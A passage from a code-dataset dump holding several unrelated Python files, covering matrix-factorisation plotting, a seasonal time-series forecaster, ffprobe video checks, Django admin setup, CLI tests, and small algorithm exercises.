vh[:K]\n\n if compare == \"w\":\n dots = np.zeros((K,K))\n for i in range(K):\n for j in range(K):\n dots[i,j] = np.dot(W[:,i],W[:,j])\n\n plt.close(\"all\")\n fig,axis = plt.subplots(1,1,figsize= (5,4.5))\n im = axis.imshow(np.abs(dots),vmin = 0,vmax = 1)\n fig.colorbar(mappable=im)\n axis.tick_params(labelsize = 18)\n axis.set_title(\"$w_i.w_j$\",fontsize = 20)\n if savefile is not None:\n fig.savefig(savefile + \"_%d\"%W.shape[1] + \"_ww.png\",dpi = 150)\n plt.show()\n\n else:\n dots_svd = np.zeros((K,K))\n for i in range(K):\n for j in range(K):\n dots_svd[i,j] = np.dot(W[:,i],u_K[:,j])\n\n filt = np.argsort(-np.abs(np.diag(dots_svd))) \n dots_svd_sorted = (dots_svd[:,filt])[filt,:]\n\n plt.close(\"all\")\n fig,axis = plt.subplots(1,1,figsize= (5,4.5))\n im = axis.imshow(np.abs(dots_svd_sorted),vmin = 0,vmax = 1)\n fig.colorbar(mappable=im)\n axis.tick_params(labelsize = 18)\n axis.set_title(\"$w_i.u_j$\",fontsize = 20)\n if savefile is not None:\n fig.savefig(savefile + \"_%d\"%W.shape[1] + \"_wu.png\",dpi = 150)\n plt.show()\n \n \n\n\ndef get_errors_heldout(F,envs_ho,K,lamb2s,lamb1,verbose = True):\n E_ho = len(envs_ho)\n E = F.shape[0]\n L = F.shape[1]\n \n envs_ho_slice = np.zeros(E,dtype=bool)\n envs_ho_slice[envs_ho] = 1\n\n \n Ws, Ms = run_factorizer_regularized_range(F[~envs_ho_slice], K, lamb2s, lamb1, norm = \"loci\")\n\n u,s,vh = np.linalg.svd(F[~envs_ho_slice])\n u_K = u[:,:K]\n s_K = s[:K]\n vh_K = vh[:K]\n Msvd = vh_K\n\n Ws = np.zeros((len(Ws),E,K))\n Wsvds = np.zeros((len(Ws),E,K))\n\n F_ems = np.zeros((len(Ws),E,L))\n F_svds = np.zeros((len(Ws),E,L))\n\n for im,M in enumerate(Ms):\n A = np.eye(K)*lamb1 + np.matmul(M,M.T)\n B = np.linalg.solve(A,M)\n Ws[im] = np.matmul(F,B.T)\n F_ems[im] = Ws[im]@M\n\n A = np.eye(K)*lamb1 + np.matmul(Msvd,Msvd.T)\n B = np.linalg.solve(A,Msvd)\n Wsvds[im] = np.matmul(F,B.T)\n F_svds[im] = Wsvds[im]@Msvd\n\n if verbose:\n print(\"lamb2 Err EM nHO Err EM HO Err SVD nHO Err SVD HO \")\n errs_EM_nho = np.zeros(len(lamb2s))\n errs_EM_ho = np.zeros(len(lamb2s))\n errs_SVD_nho = np.zeros(len(lamb2s))\n errs_SVD_ho = np.zeros(len(lamb2s))\n\n for i in range(len(lamb2s)):\n err_EM_nho = np.mean((F[~envs_ho_slice] - F_ems[i][~envs_ho_slice])**2)\n err_EM_ho = np.mean((F[envs_ho_slice] - F_ems[i][envs_ho_slice])**2)\n\n err_SVD_nho = np.mean((F[~envs_ho_slice] - F_svds[i][~envs_ho_slice])**2)\n err_SVD_ho = np.mean((F[envs_ho_slice] - F_svds[i][envs_ho_slice])**2)\n\n errs_EM_nho[i] = err_EM_nho\n errs_EM_ho[i] = err_EM_ho\n errs_SVD_nho[i] = err_SVD_nho\n errs_SVD_ho[i] = err_SVD_ho\n \n if verbose:\n print(\"%.3f %.3f %.3f %.3f %.3f\"%(lamb2s[i],err_EM_nho,err_EM_ho, err_SVD_nho, err_SVD_ho))\n\n return errs_EM_nho, errs_EM_ho, errs_SVD_nho, errs_SVD_ho\n\ndef get_atts_with_keff_and_k_fixed(atts, k ):\n restricted_atts = dict.fromkeys(atts.keys(),[])\n for key in atts:\n new_list = []\n for _ in range(len(atts[\"keff\"])):\n if atts[\"keff\"][_] == k and atts[\"k\"][_]==k:\n new_list.append(atts[key][_])\n restricted_atts[key] = new_list\n\n return restricted_atts\n\ndef plot_tradeoffs(atts, atts_rot, kmin, kmax, ks=None, title = None):\n fontsize = 14\n restricted_atts = {}\n restricted_atts_rot = {}\n if kmin is not None:\n ks = range(kmin,kmax+1)\n else:\n kmin = min(ks)\n kmax = max(ks)\n for k in ks:\n restricted_atts[k] = get_atts_with_keff_and_k_fixed(atts, k)\n restricted_atts_rot[k] = get_atts_with_keff_and_k_fixed(atts_rot, k)\n #plt.scatter(restricted_atts[k][\"ave modules / loci\"], restricted_atts[k][\"error\"])\n #plt.scatter(restricted_atts_rot[k][\"ave modules / loci\"], restricted_atts_rot[k][\"error\"])\n #plt.title(f\"k={k}\")\n #plt.show()\n if len(restricted_atts_rot[k][\"ave processes / loci\"])>0:\n mn = min(restricted_atts_rot[k][\"ave processes / loci\"])\n mx = max(restricted_atts_rot[k][\"ave processes / loci\"])\n else:\n mn = 0\n mx = 0\n f = interpolate.interp1d(restricted_atts_rot[k][\"ave processes / loci\"], restricted_atts_rot[k][\"error\"])\n restricted_atts[k][\"FO err / F err\"] = []\n for _,aml in enumerate(restricted_atts[k][\"ave processes / loci\"]):\n if aml < mn or aml > mx:\n restricted_atts[k][\"FO err / F err\"].append(-1)\n else:\n restricted_atts[k][\"FO err / F err\"].append(f(aml)/restricted_atts[k][\"error\"][_])\n #plt.scatter(restricted_atts[k][\"ave modules / loci\"],restricted_atts[k][\"FO err / F err\"] )\n #plt.show()\n\n plt.figure(figsize=(12,8))\n mn = 100\n mx = -1\n for k in ks:\n if len(restricted_atts[k][\"FO err / F err\"])>0:\n mx = max(max(restricted_atts[k][\"FO err / F err\"]), mx)\n if len([_ for _ in restricted_atts[k][\"FO err / F err\"] if _>0])>0:\n mn = min(min([_ for _ in restricted_atts[k][\"FO err / F err\"] if _>0]), mn)\n\n for k in ks:\n x1s, x2s, y1s, y2s, c1s = [], [], [], [], []\n for n, val in enumerate(restricted_atts[k][\"FO err / F err\"]):\n if val > 0:\n x1s.append(restricted_atts[k][\"error\"][n])\n y1s.append(restricted_atts[k][\"ave processes / loci\"][n])\n c1s.append(restricted_atts[k][\"FO err / F err\"][n])\n else:\n x2s.append(restricted_atts[k][\"error\"][n])\n y2s.append(restricted_atts[k][\"ave processes / loci\"][n]) \n plt.plot(restricted_atts[k][\"error\"],restricted_atts[k][\"ave processes / loci\"], label = f\"k = {k}\", c = 'black', alpha = .8-.8*((k-kmin) / (kmax-kmin + 1)))\n plt.scatter(x2s, y2s, marker = 'd', c= 'black')\n plt.scatter(x1s,y1s, c = c1s, vmin = mn, vmax =mx, cmap = 'viridis_r')\n\n\n plt.xlabel(\"error\", fontsize = fontsize)\n plt.ylabel(\"ave processes / loci\", fontsize = fontsize)\n cbar = plt.colorbar()\n cbar.set_label(\"FO error / F error\")\n plt.legend()\n plt.grid()\n if title is not None: plt.title(title, fontsize = fontsize)\n plt.show()\n \n","repo_name":"spetti/sparse-structure-discovery","sub_path":"SSD/utils/ssd.py","file_name":"ssd.py","file_ext":"py","file_size_in_byte":22760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"41022878864","text":"import logging\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom typing import List, Literal, Union\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\n\n\nlogging.basicConfig(level=logging.DEBUG, format=\"%(asctime)s %(levelname)s:%(message)s\")\nLOGGER = logging.getLogger(__name__)\n\n\nclass SymCalc:\n def __init__(self, method: Literal[\"dtw\", \"chi_square\"] = \"dtw\", bin_size: str = 30, \n agg_f: Literal[\"median\", \"mean\"] = \"median\") -> None:\n self.method = method\n self.bin_size = bin_size\n self.agg_f = agg_f\n \n def __call__(self, p: np.ndarray, q: np.ndarray) -> float:\n method = getattr(self, self.method)\n distance = method(p, q)\n return distance\n \n def chi_square(self, p: np.ndarray, q: np.ndarray) -> float:\n n_items = (len(p) + len(q)) // 2\n n_splits = self.calc_nsplits_(n_items=n_items, bin_size=self.bin_size)\n agg_f = getattr(np, \"nan\" + self.agg_f)\n\n bins_p = np.array_split(ary=p, indices_or_sections=n_splits)\n bins_p = np.array([agg_f(arr) for arr in bins_p])\n bins_p /= sum(bins_p)\n\n bins_q = np.array_split(ary=q, indices_or_sections=n_splits)\n bins_q = np.array([agg_f(arr) for arr in bins_q])\n bins_q /= sum(bins_q)\n\n statistic, _ = stats.chisquare(f_obs=bins_p, f_exp=bins_q, ddof=0)\n return statistic\n\n @staticmethod\n def calc_nsplits_(n_items: int, bin_size: int) -> int:\n return n_items // bin_size + (1 if n_items % bin_size else 0)\n\n @staticmethod\n def dtw(p: np.ndarray, q: np.ndarray) -> float:\n # create empty cost matrix\n cost_m = [[0 for _ in range(len(q))] for _ in range(len(p))]\n\n # заполним матрицу\n cost_m[0][0] = abs(p[0] - q[0])\n for col in range(0, len(q)):\n\n if col != 0:\n cost_m[0][col] = abs(p[0] - q[col]) + cost_m[0][col - 1]\n\n for row in range(1, len(p)):\n if col == 0:\n cost_m[row][col] = abs(p[row] - q[col]) + cost_m[row - 1][col]\n continue\n\n cost_m[row][col] = \\\n abs(p[row] - q[col]) + \\\n min(cost_m[row - 1][col - 1], cost_m[row - 1][col], cost_m[row][col - 1])\n \n # wraping path identification\n row, col = len(p) - 1, len(q) - 1\n d = []\n d.append(cost_m[row][col])\n\n while row > 0 or col > 0:\n neighbors = [float(\"inf\"), float(\"inf\"), float(\"inf\")]\n if row > 0 and col > 0:\n neighbors[2] = cost_m[row - 1][col - 1]\n if row > 0:\n neighbors[1] = cost_m[row - 1][col]\n if col > 0:\n neighbors[0] = cost_m[row][col - 1]\n idx = np.argmin(neighbors) + 1\n step = (idx // 2, idx % 2)\n row, col = row - step[0], col - step[1]\n d.append (cost_m[row][col]) \n\n return sum(d) / len(d)\n\n\nclass Preprocessing:\n \n def __init__(self, roles: dict = {}, stages: List[Literal[\"extend_time\", \"interpolate\"]] = [\"extend_time\", \"interpolate\"]) -> None:\n self.roles = {\"datetime\": \"datetime\", \"value\": \"value\", **roles}\n self.stages = stages\n\n def __call__(self, data: pd.DataFrame) -> pd.DataFrame:\n for stage in self.stages:\n method = getattr(self, stage)\n data = method(data)\n return data\n\n def extend_time(self, data: pd.DataFrame) -> pd.DataFrame:\n min_date, max_date = data[self.roles.get(\"datetime\")].agg([\"min\", \"max\"])\n freq = int(data[self.roles.get(\"datetime\")].diff().dropna().min().total_seconds() // 60)\n timeline = pd.date_range(start=min_date, end=max_date, freq=\"%sT\" % freq)\n data = pd.DataFrame(data={self.roles.get(\"datetime\"): timeline}) \\\n .merge(data.rename(columns=self.roles), on=self.roles.get(\"datetime\"), how=\"left\")\n return data\n\n def interpolate(self, data: pd.DataFrame) -> pd.DataFrame:\n data.loc[:, self.roles.get(\"value\")] = data.loc[:, self.roles.get(\"value\")] \\\n .interpolate(method=\"linear\", limit_area=\"inside\")\n return data\n \n\ndef rolling(arr: np.ndarray, window: int = 50, agg_f: Literal[\"mean\", \"median\"] = \"median\"):\n agg_f = getattr(np, \"nan\" + agg_f)\n ans = np.full_like(a=arr, fill_value=1, dtype=\"float64\")\n wc = window // 2 + (1 if window % 2 else 0) - 1\n for i in range(0, len(arr)):\n left_idx = max(0, i - wc)\n right_idx = left_idx + window\n\n if right_idx > len(arr):\n right_idx = len(arr)\n left_idx = right_idx - window\n\n value = agg_f(arr[left_idx:right_idx])\n ans[i] = value\n return ans\n\n\nclass TSModel:\n\n def __init__(self, h_size: int = 28, trend: Literal[\"linear\", \"polynomial\"] = \"linear\", p_degree: int = 2,\n roles: dict = {}, seasonal_type: Union[int, Literal[\"weekly\", \"daily\"]] = \"weekly\", \n agg_f: Literal[\"mean\", \"median\"] = \"median\", model_type: Literal[\"additive\", \"multiplicative\"] = \"additive\",\n holidays: pd.DataFrame = None, freq: int = 1, skip_holidays: bool = True, \n use_skaler: bool = True, scaler_window: int = 50, scaler_agg: Literal[\"mean\", \"median\"] = \"mean\", \n fix_negative: bool = True, **kwargs) -> None:\n \"\"\"\n :param h_size: размер обучающей выборки количестве значений (в днях)\n :param trend: тип детектируемого тренда (\"linear\" или \"polynomial\")\n :param p_degree: степень полинома в случае с полиномиальным трендом\n :param roles: названия колонок \"datetime\" и \"value\" в данных\n :param seasonal_type: тип максимальной сезонности (т.е. если присутствует и недельная, и дневная, то указывается недельная)\n :param agg_f: аггрегирующая функция при расчете сезонной компоненты\n :param model_type: тип модели (аддитивная или мультипликативная)\n \"\"\"\n self.h_size = h_size\n self.trend = trend\n self.p_degree = p_degree\n self.roles = {\"datetime\": \"datetime\", \"value\": \"value\", **roles}\n self.seasonal_type = seasonal_type\n self.agg_f = agg_f\n self.model_type = model_type\n self.holidays = holidays\n self.freq = freq\n self.skip_holidays = skip_holidays\n self.use_skaler = use_skaler\n self.scaler_window = scaler_window\n self.scaler_agg = scaler_agg\n self.fix_negative = fix_negative\n\n def fit_predict(self, data: pd.DataFrame, horizon: int = 1, py_data: pd.DataFrame = None) -> pd.DataFrame:\n \"\"\"\n :param data: исторические данные для настройки модели\n :param horizon: горизонт прогнозирования (в днях)\n \"\"\"\n # настройка модели\n self.fit(data=data)\n\n # предсказание модели\n results = self.predict(horizon=horizon, py_data=py_data)\n return results\n\n def fit(self, data: pd.DataFrame) -> None:\n \"\"\"\n :param data: DataFrame с колонками даты и значения\n значения должны быть без пропусков в timeline\n \"\"\"\n # первая дата для предсказ��ния\n self.predict_from = data[\"datetime\"].iloc[-1] + pd.DateOffset(minutes=self.freq)\n\n # количество данных для обучения\n self.h_size_items = int(self.h_size * (24 * 60) // self.freq)\n\n # если размер истории меньше, чем выставленный параметр размера истории\n # то корректируем\n self.h_size_items = min(len(data), self.h_size_items)\n\n # настраиваем тренд\n fit_data = data.iloc[-self.h_size_items:, :] # обучающая выборка\n self.discard_mask = fit_data[self.roles.get(\"value\")].isna().values\n if self.holidays is not None and self.skip_holidays:\n self.discard_mask |= fit_data[self.roles.get(\"datetime\")].dt.normalize().isin(self.holidays[\"datetime\"]).values\n y = fit_data[self.roles.get(\"value\")].values\n detrended = self.fit_trend_(y=y)\n\n # настроим сезонность\n self.fit_seasonal_(y=detrended, timeline=fit_data[self.roles.get(\"datetime\")])\n return\n \n def fit_trend_(self, y: np.ndarray) -> None:\n # инициализируем модель линейной регрессии\n self.lr = LinearRegression()\n x = self.trend_features_generation_()\n self.lr.fit(x[~self.discard_mask], y[~self.discard_mask])\n trend = self.lr.predict(x)\n\n if self.model_type == \"additive\":\n detrended = y - trend\n elif self.model_type == \"multiplicative\":\n detrended = y / trend\n else:\n raise ValueError(\"Wrong model type.\")\n \n return detrended\n \n def trend_features_generation_(self, horizon: int = None) -> np.ndarray:\n \"\"\"\n :param horizon: количество точек для прогнозирования (не дней)\n \"\"\"\n if horizon is None:\n x = np.reshape(range(self.h_size_items), newshape=(-1, 1))\n elif isinstance(horizon, int) and horizon > 0:\n x = np.reshape(range(horizon), newshape=(-1, 1))\n x += self.h_size_items\n else:\n raise ValueError(\"Wrong horizon value (has to be integer greater than 0)\")\n\n if self.trend == \"polynomial\":\n pf = PolynomialFeatures(degree=self.p_degree, include_bias=False)\n x = pf.fit_transform(x)\n \n return x\n \n def fit_seasonal_(self, y: np.ndarray, timeline: pd.Series) -> None:\n y_filtered = np.where(~self.discard_mask, y, np.nan)\n \n if isinstance(self.seasonal_type, int):\n sl = self.seasonal_type\n self.seasonal_groups = np.zeros(shape=(sl))\n elif isinstance(self.seasonal_type, str) and self.seasonal_type == \"weekly\":\n sl = 7 * 1440 // self.freq\n # считаем, что помимо недельной сезонности есть еще и дневная\n self.seasonal_groups = \\\n timeline.iloc[-1:-sl - 1:-1] \\\n .groupby(by=timeline.iloc[-1:-sl - 1:-1].dt.normalize()) \\\n .ngroup() \\\n .values\n elif isinstance(self.seasonal_type, str) and self.seasonal_type == \"daily\":\n sl = 1440 // self.freq\n self.seasonal_groups = np.zeros(shape=(sl))\n else:\n raise ValueError(\"Wrong seasonal component.\")\n \n if self.h_size_items % sl:\n self.seasonal = np.insert(arr=y_filtered.astype(\"float\"), obj=[0]*(sl - self.h_size_items % sl), values=np.nan)\n self.seasonal = np.reshape(self.seasonal, newshape=(sl, -1), order=\"F\")\n agg_f = getattr(np, \"nan\" + self.agg_f)\n else:\n self.seasonal = np.reshape(y_filtered, newshape=(sl, -1), order=\"F\")\n agg_f = getattr(np, \"nan\" + self.agg_f)\n \n self.seasonal = agg_f(self.seasonal, axis=1)\n return\n \n def predict(self, horizon: int = 1, py_data: pd.DataFrame = None) -> pd.DataFrame:\n \"\"\"\n :param horizon: горизонт прогнозирования (в днях)\n :param py_data:\n \"\"\"\n # время предсказания\n pred_from = self.predict_from\n pred_to = self.predict_from + pd.Timedelta(minutes=horizon*1440 - 1)\n pred_tl = pd.date_range(start=pred_from, \n end =pred_to, \n freq =\"%sT\" % self.freq)\n\n # предсказываем тренд\n trend = self.predict_trend_(horizon=horizon)\n\n # предсказываем сезонную компоненту\n seasonal = self.predict_seasonal_(seasonal_comp=self.seasonal, freq=self.freq, horizon=horizon)\n \n # скорректируем прогноз сезонной компоненты в соответстви�� с праздниками\n if py_data is not None and self.holidays is not None:\n # только те праздники, которые попадают в период прогнозирования\n filtered_holidays = \\\n self.holidays[self.holidays[\"datetime\"].between(left =pred_from,\n right=pred_to)]\n filtered_holidays = \\\n filtered_holidays.dropna(axis=0, subset=[\"Выходной / праздник\"], how=\"any\")\n\n # если какие-то праздики попадаю в указанных период, то корректируем сезонную компоненту для них\n if not filtered_holidays.empty:\n # настраиваем модель за предыдущий год и считаем прогноз\n py_train_data = py_data[:-1440*horizon//self.freq]\n self.py_model = TSModel(**self.__dict__)\n py_forecast = self.py_model.fit_predict(data=py_train_data, horizon=horizon)\n\n # определяем смещение дней недели в сезонной компоненте для прошлого года и для текущего\n shift = self.predict_from.weekday() - self.py_model.predict_from.weekday()\n LOGGER.debug(\"Смещение дней недели в сезонных компонентах прошлого года и текущего: %s\" % shift)\n\n # итерируемся по празникам\n for _, holiday in filtered_holidays.iterrows():\n # определяем дату праздника в прошлом году\n holiday_date = holiday[\"datetime\"]\n py_holiday_date = holiday_date - pd.DateOffset(years=1)\n LOGGER.debug(\"Праздничный день: %s\" % holiday_date)\n\n # рельные значения во время праздника в прошлом году\n py_holiday_mask = \\\n (py_forecast[self.roles.get(\"datetime\")].dt.normalize() == py_holiday_date).values\n py_holiday_actual = \\\n py_data.iloc[-1440*horizon//self.freq:].loc[py_holiday_mask, self.roles.get(\"value\")].values\n\n # удаляем тренд из реальных значений праздника в прошлом году\n py_trend = py_forecast.loc[py_holiday_mask, \"trend\"].values\n py_detrended = py_holiday_actual / py_trend\n\n # ищем ближайший день из сезонной компоненты для данного праздника в прошлом году\n sc = SymCalc(method=\"chi_square\")\n best_seasonal_idx = 0\n best_similarity = float(\"inf\")\n for seasonal_idx in np.unique(self.py_model.seasonal_groups):\n similarity = sc(p=py_detrended, q=self.py_model.seasonal[self.py_model.seasonal_groups == seasonal_idx])\n LOGGER.debug(\"Значение близости для дня с индексом {} из сезонной компоненты \" \\\n \"(прошлый год): {:.5f}\".format(seasonal_idx, similarity))\n \n if similarity < best_similarity:\n best_similarity = similarity\n best_seasonal_idx = seasonal_idx\n \n LOGGER.debug(\"Лучший день из сезонной компоненты в прошлом году: {} \" \\\n \"(значение близости: {:.5f})\".format(best_seasonal_idx, best_similarity))\n \n curr_idx = np.roll(np.unique(self.seasonal_groups), shift=-shift)[best_seasonal_idx]\n LOGGER.debug(\"Аналогичный день из сезонной компоненты в текущем году: %s\" % (curr_idx))\n\n # заменяем сезонную компоненту для праздника в текущем году\n curr_mask = (pred_tl.normalize() == holiday_date)\n seasonal[curr_mask] = self.seasonal[self.seasonal_groups == curr_idx]\n\n # определим скалирующий коэффициент и сгладим его\n if self.use_skaler:\n with np.errstate(divide='ignore', invalid='ignore'):\n scaler = py_detrended / self.py_model.seasonal[self.py_model.seasonal_groups == best_seasonal_idx]\n scaler = np.where(np.isfinite(scaler), scaler, 1)\n scaler = rolling(arr=scaler, window=self.scaler_window, agg_f=self.scaler_agg)\n seasonal[curr_mask] *= scaler\n \n # объединяем прогнозы компонент\n if self.model_type == \"additive\":\n forecast = seasonal + trend\n elif self.model_type == \"multiplicative\":\n forecast = seasonal * trend\n else:\n raise ValueError(\"Wrong model type.\")\n \n # Коррекция отрицательных значений (если такие имеются)\n if self.fix_negative:\n forecast = np.where(forecast >= 0, forecast, 0)\n \n results = pd.DataFrame(data={\"datetime\": pred_tl, \"forecast\": forecast, \"trend\": trend, \"seasonal\": seasonal})\n return results\n \n def predict_trend_(self, horizon: int = 1) -> np.ndarray:\n \"\"\"\n :param horizon: горизонт прогнозирования (в днях)\n \"\"\"\n x = self.trend_features_generation_(horizon=int(horizon * 1440 // self.freq))\n trend = self.lr.predict(x)\n return trend\n\n @staticmethod\n def predict_seasonal_(seasonal_comp: np.ndarray, horizon: int = 1, freq: int = 1) -> np.ndarray:\n \"\"\"\n :param horizon: горизонт прогнозирования (в днях)\n \"\"\"\n n_points = int(horizon*1440 // freq)\n if n_points > len(seasonal_comp):\n n_rep = n_points // len(seasonal_comp) + (1 if n_points % len(seasonal_comp) else 0)\n seasonal = np.tile(seasonal_comp, n_rep)[:n_points]\n else:\n seasonal = seasonal_comp[:n_points]\n return seasonal\n","repo_name":"JosephFrancisTribbiani/ds","sub_path":"Tasks/ts_foracasting_model/tsforecast/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":19422,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40414449111","text":"import os\nimport subprocess\nimport json\n\ndef get_ffprobe_info(filepath):\n command = [\"ffprobe\", \"-v\", \"quiet\", \"-print_format\", \"json\", \"-show_format\", \"-show_streams\", filepath]\n ffprobe_process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, universal_newlines=True)\n stdout, stderr = ffprobe_process.communicate()\n jsonout = json.loads(stdout)\n return jsonout\n\n#def should_convert(filepath):\ndef should_convert(ffprobe_json):\n result = True\n h264stream = False;\n aacstream = False;\n mp4File = False;\n large_resolution = False\n frame_rate_raw = 30\n\n fileExt = os.path.splitext(ffprobe_json[\"format\"][\"filename\"])[1]\n if fileExt == \".mp4\":\n file_streams = ffprobe_json[\"streams\"]\n file_format = ffprobe_json[\"format\"][\"format_long_name\"]\n mp4File = file_format == \"QuickTime / MOV\"\n if mp4File:\n for stream in file_streams:\n codec = stream[\"codec_name\"]\n if codec == \"h264\":\n h264stream = True\n frame_rate_raw = eval(stream[\"avg_frame_rate\"])\n if stream[\"width\"] > 1920 or stream[\"height\"] > 1080:\n large_resolution = True\n\n elif codec == \"aac\":\n aacstream = True\n\n if h264stream and aacstream:\n break\n\n bitrate = int(ffprobe_json[\"format\"][\"bit_rate\"])\n else:\n mp4File = False\n\n if mp4File and bitrate <= 1572864 and (h264stream and aacstream) and not large_resolution and (10 <= frame_rate_raw <= 30):\n #if mp4File and bitrate <= 3145728 and (h264stream and aacstream):\n result = False\n\n print(\"FINAL RESULT: {}\".format(result))\n return result\n\ndef get_duration(ffprobe_json):\n tmp_duration = ffprobe_json[\"format\"][\"duration\"]\n duration = int(float(tmp_duration)) if tmp_duration else 0\n return duration\n\ndef get_frame_rate(ffprobe_json):\n result = 30\n frame_rate_raw = \"\"\n for stream in ffprobe_json[\"streams\"]:\n if stream[\"codec_type\"] == \"video\":\n frame_rate_raw = stream[\"avg_frame_rate\"]\n\n if frame_rate_raw:\n result = eval(frame_rate_raw)\n break\n\n return result\n\n\n\ndef get_display_resolution(ffprobe_json):\n result = {\"width\": 0, \"height\": 0}\n for stream in ffprobe_json[\"streams\"]:\n if stream[\"codec_type\"] == \"video\":\n result[\"width\"] = int(stream[\"width\"])\n result[\"height\"] = int(stream[\"height\"])\n break\n\n return result\n\n","repo_name":"Ryochan7/testtube","sub_path":"videos/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"29543492075","text":"from django.contrib import admin\r\nfrom .models import *\r\n\r\nclass TrackInline(admin.TabularInline):\r\n model = Track\r\n fields = (\r\n 'track_number',\r\n 'title',\r\n 'collection',\r\n 'artist',\r\n 'is_remix',\r\n 'goodness',\r\n 'video_url',\r\n 'slug'\r\n )\r\n# Register your models here.\r\n@admin.register(Track)\r\nclass TrackAdmin(admin.ModelAdmin):\r\n list_display = (\r\n 'track_number',\r\n 'title',\r\n 'collection',\r\n 'artist',\r\n 'is_remix',\r\n 'duration',\r\n 'goodness',\r\n 'video_url',\r\n 'get_date',\r\n 'slug'\r\n )\r\n\r\n list_display_links = ('title',)\r\n\r\n list_editable = (\r\n 'track_number',\r\n 'collection',\r\n 'artist',\r\n 'is_remix',\r\n 'goodness',\r\n 'video_url',\r\n 'slug'\r\n )\r\n\r\n def get_date(self, obj):\r\n return obj.collection.date\r\n get_date.short_description = 'Date'\r\n get_date.admin_order_field = 'collection__date'\r\n\r\n list_filter = ('collection','artist','is_remix','collection','goodness', 'collection__kind')\r\n\r\n search_fields = ('collection','artist','title','video_url')\r\n\r\n prepopulated_fields = {'slug':('title',)}\r\n\r\n@admin.register(Collection)\r\nclass CollectionAdmin(admin.ModelAdmin):\r\n list_display = (\r\n 'title',\r\n 'kind',\r\n 'date',\r\n 'description_fr',\r\n 'description_en',\r\n 'cover_color',\r\n 'cover_accent_color',\r\n 'work_time',\r\n 'playlist_url',\r\n 'slug'\r\n )\r\n list_editable = (\r\n 'kind',\r\n 'work_time',\r\n 'playlist_url',\r\n 'slug'\r\n )\r\n\r\n inlines = [TrackInline,]\r\n\r\n list_filter = ('date','kind','work_time','cover_color')\r\n\r\n date_hierarchy = 'date'\r\n\r\n ordering = ('date',)\r\n\r\n search_fields = ('title','kind','playlist_url','description_fr','description_en', 'cover_accent_color')\r\n\r\n prepopulated_fields = {'slug':('title',)}\r\n\r\n","repo_name":"ewen-lbh/portfolio-v2","sub_path":"music/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72667610186","text":"from __future__ import annotations\nfrom typing import Any\nfrom tests.dsdl import OUTPUT_DIR\nfrom tests.subprocess import execute_cli\n\n\ndef _unittest_subscribe(compiled_dsdl: Any) -> None:\n _ = compiled_dsdl\n env = {\n \"UAVCAN__LOOPBACK\": \"1\",\n \"UAVCAN__NODE__ID\": \"1234\",\n \"YAKUT_PATH\": str(OUTPUT_DIR),\n }\n # No subjects specified.\n _, _, stderr = execute_cli(\"-vv\", \"sub\", timeout=5.0, environment_variables=env)\n assert \"nothing to do\" in stderr.lower()\n assert \"no subject\" in stderr.lower()\n # Count zero.\n _, _, stderr = execute_cli(\n \"-vv\", \"sub\", \"4444:uavcan.si.unit.force.Scalar\", \"--count=0\", timeout=5.0, environment_variables=env\n )\n assert \"nothing to do\" in stderr.lower()\n assert \"count\" in stderr.lower()\n\n\ndef _unittest_dsdl_not_found() -> None:\n result, _, stderr = execute_cli(\n \"sub\",\n \"4444:uavcan.si.unit.force.Scalar\",\n timeout=5.0,\n ensure_success=False,\n environment_variables={\n \"UAVCAN__LOOPBACK\": \"1\",\n \"UAVCAN__NODE__ID\": \"1234\",\n },\n )\n assert result != 0\n assert \"yakut compile\" in stderr.lower()\n\n\ndef _unittest_transport_not_specified(compiled_dsdl: Any) -> None:\n _ = compiled_dsdl\n result, _, stderr = execute_cli(\n \"sub\",\n \"4444:uavcan.si.unit.force.Scalar\",\n timeout=5.0,\n ensure_success=False,\n environment_variables={\n \"YAKUT_PATH\": str(OUTPUT_DIR),\n },\n )\n assert result != 0\n assert \"transport\" in stderr.lower()\n","repo_name":"OpenCyphal/yakut","sub_path":"tests/cmd/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"81"} +{"seq_id":"5925031061","text":"# 괄호 변환\n\ndef is_valid_bracket(s):\n stack = []\n for c in s:\n if c == \"(\":\n stack.append(c)\n else:\n if len(stack) == 0:\n return False\n else:\n if stack.pop() != \"(\":\n return False\n return len(stack) == 0\n\n\ndef solution(p):\n if is_valid_bracket(p):\n return p\n dic = {\"(\": 0, \")\": 0}\n for i in range(len(p)):\n dic[p[i]] += 1\n if dic[\"(\"] == dic[\")\"]:\n u, v = p[:i+1], p[i+1:]\n break\n if is_valid_bracket(u):\n return u + solution(v)\n else:\n new_u = \"\"\n for i in u[1:-1]:\n new_u += \")\" if i == \"(\" else \"(\"\n return \"(\" + solution(v) + \")\" + new_u\n","repo_name":"KimHS0915/programmers-learn-challenges","sub_path":"lv2/60058.py","file_name":"60058.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4653887701","text":"NUM_BUCKETS = 2003 # A prime number\n\nclass MyHashSet:\n\n def __init__(self):\n # Make the hash buckets.\n self.buckets = [[] for _ in range(NUM_BUCKETS)]\n\n def add(self, key: int) -> None:\n mod = key % NUM_BUCKETS\n if not key in self.buckets[mod]:\n self.buckets[mod].append(key)\n\n def remove(self, key: int) -> None:\n mod = key % NUM_BUCKETS\n # Remove if it's present\n try:\n self.buckets[mod].remove(key)\n except:\n pass\n \n def contains(self, key: int) -> bool:\n mod = key % NUM_BUCKETS\n return key in self.buckets[mod]\n \n \nclass MyHashSet:\n\n def __init__(self):\n self.array = []\n self.mapping = {}\n self.index = 0\n\n def add(self, key: int) -> None:\n if key not in self.mapping:\n self.mapping[key] = self.index\n self.array.append(key)\n self.index += 1\n\n def remove(self, key: int) -> 